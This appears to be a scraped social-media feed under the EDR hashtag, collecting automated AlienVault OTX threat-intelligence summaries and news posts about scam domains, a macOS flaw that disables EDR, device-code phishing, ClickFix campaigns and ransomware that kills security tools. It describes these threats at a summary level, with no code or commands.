🚨 NEWS: Il 12,7% dei dispositivi è invisibile agli agenti di sicurezza autonomi secondo il rapporto Axonius
Ecco i punti chiave in breve:
💡 Un agente endpoint non può segnalare la propria assenza. Il rapporto Axonius Actionability 2026, realizzato con il Ponemon Institute su 662 professionisti IT e di sicurezza, ha qua...
#aiAct #eDR #agentiDiSicurezzaAutonomi #coperturaEndpoint #axonius
From San Pedro to Salinas: How a Chinese Framework “DCloud Uni-App” Powers a Global Scam Economy
A Chinese web-development framework called DCloud Uni-App has become the technical foundation for over 236,000 scam domains since 2022, powering fake cryptocurrency exchanges, pig-butchering operations, wallet drainers, gambling platforms, and brand-impersonation sites. The framework gained prominence after the 2024 RainbowEx cryptocurrency scam in Argentina, which defrauded residents of San Pedro. Similar operations include the Lightning Shared Scooter Co. (LSSC) scam in the United States, which caused millions in losses across multiple states, and the currently-active Yuechi Sharing Technology Ltd. bicycle-sharing investment scam. These operations use legitimate hosting providers, with approximately 6% utilizing bulletproof hosting, particularly CTG Server. The scams target victims globally through WhatsApp, Telegram, and social media, converting victims into recruiters for pyramid-style operations. Enterprise exposure reaches over 985 distinct organizations across 25 industry verticals, with over five m...
Pulse ID: 6a3d76e5578987f6ddf8979f
Pulse Link: https://otx.alienvault.com/pulse/6a3d76e5578987f6ddf8979f
Pulse Author: AlienVault
Created: 2026-06-25 18:43:49
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Chinese #Cloud #CyberSecurity #EDR #InfoSec #OTX #OpenThreatExchange #RAT #SocialMedia #Telegram #UnitedStates #WhatsApp #bot #cryptocurrency #AlienVault
Oops… A macOS XPC flaw can disable EDR and MDM protections — even trusted endpoint controls can be bypassed 🍎⚠️ #MacSecurity #EDR
https://www.infosecurity-magazine.com/news/macos-xpc-flaw-disable-edr-mdm/
macOS Flaw Enables Users to Disable EDR, MDM Tools
A security flaw in macOS has been discovered that allows users to quietly disable crucial enterprise security tools, including EDR and MDM, without needing administrator privileges. This gap in endpoint security models could leave businesses vulnerable to attacks.
"Ghost" Code Phishing Analysis
EvilTokens is a sophisticated phishing kit that conceals critical components of its attack through browser-side AES-GCM encryption, creating visibility gaps for traditional static URL analysis. The kit exploits Microsoft's legitimate device login flow through OAuth device-code phishing to gain account access without directly stealing passwords. Targeting organizations primarily in the United States and Europe, EvilTokens focuses on managed security services, technology, manufacturing, education, banking, and consulting sectors. The encrypted landing page only reveals its malicious content after browser decryption, requiring dynamic analysis to uncover the complete attack chain. The kit uses multiple stages including gate checks, user code requests, and session monitoring to complete Microsoft 365 account takeovers while appearing legitimate through final redirects to OneDrive.
Pulse ID: 6a3b02a43a7a626b53174466
Pulse Link: https://otx.alienvault.com/pulse/6a3b02a43a7a626b53174466
Pulse Author: AlienVault
Created: 2026-06-23 22:03:16
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Bank #Browser #CyberSecurity #EDR #Education #Encryption #Europe #InfoSec #Manufacturing #Microsoft #OTX #OpenThreatExchange #Password #Passwords #Phishing #UnitedStates #Word #bot #AlienVault
PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"
A sophisticated phishing campaign leverages evolved ClickFix techniques to bypass modern endpoint security through victim-assisted execution. Targets receive emails with urgent OneDrive document lures containing malicious ZIP attachments. The attack uses LNK shortcuts that redirect victims to landing pages, silently injecting PowerShell commands into their clipboard. Through social engineering, victims are tricked into manually executing commands via Win+R, circumventing traditional security filters. The campaign employs DNS TXT records for payload staging, avoiding HTTP detection. The threat infrastructure hosts multiple malicious components including obfuscated scripts, fake MSI installers masquerading as legitimate software like ConnectWise, and ISO images with spyware for persistent access. This represents a shift toward long-game tactics focused on establishing full post-compromise environmental control.
Pulse ID: 6a3a7809c43cfba36348ed9d
Pulse Link: https://otx.alienvault.com/pulse/6a3a7809c43cfba36348ed9d
Pulse Author: AlienVault
Created: 2026-06-23 12:11:53
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Clipboard #ConnectWise #CyberSecurity #DNS #EDR #Email #Endpoint #HTTP #ICS #InfoSec #LNK #OTX #OpenThreatExchange #Phishing #PowerShell #SocialEngineering #SpyWare #ZIP #bot #AlienVault
📰 New 'Gentlemen' Ransomware Uses EDR Killer Framework to Blindside Security Tools
New 'The Gentlemen' ransomware is aggressively disabling security tools. ⚔️ It uses a multi-pronged 'GentleKiller' framework to terminate EDR/AV products before encryption. Ensure your tamper protection is on! #Ransomware #CyberSecurity #EDR
🌐 cyber[.]netsecops[.]io
New blog post!
I recently completed the OffSec Expert Penetration Tester (OSEP) certificate.
Here are my thoughts on it:
The Gentlemen RaaS Uses GentleKiller Framework for EDR Evasion and Ransomware Deployment
Pulse ID: 6a37f30eaaf37bbb5daa581f
Pulse Link: https://otx.alienvault.com/pulse/6a37f30eaaf37bbb5daa581f
Pulse Author: cryptocti
Created: 2026-06-21 14:19:58
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #InfoSec #OTX #OpenThreatExchange #RaaS #RansomWare #bot #cryptocti
Meteora Web
OTX Bot
Manuel Bissey
Analyst207
CyberNetsecIO
Kallisti
Bobe'bot on security
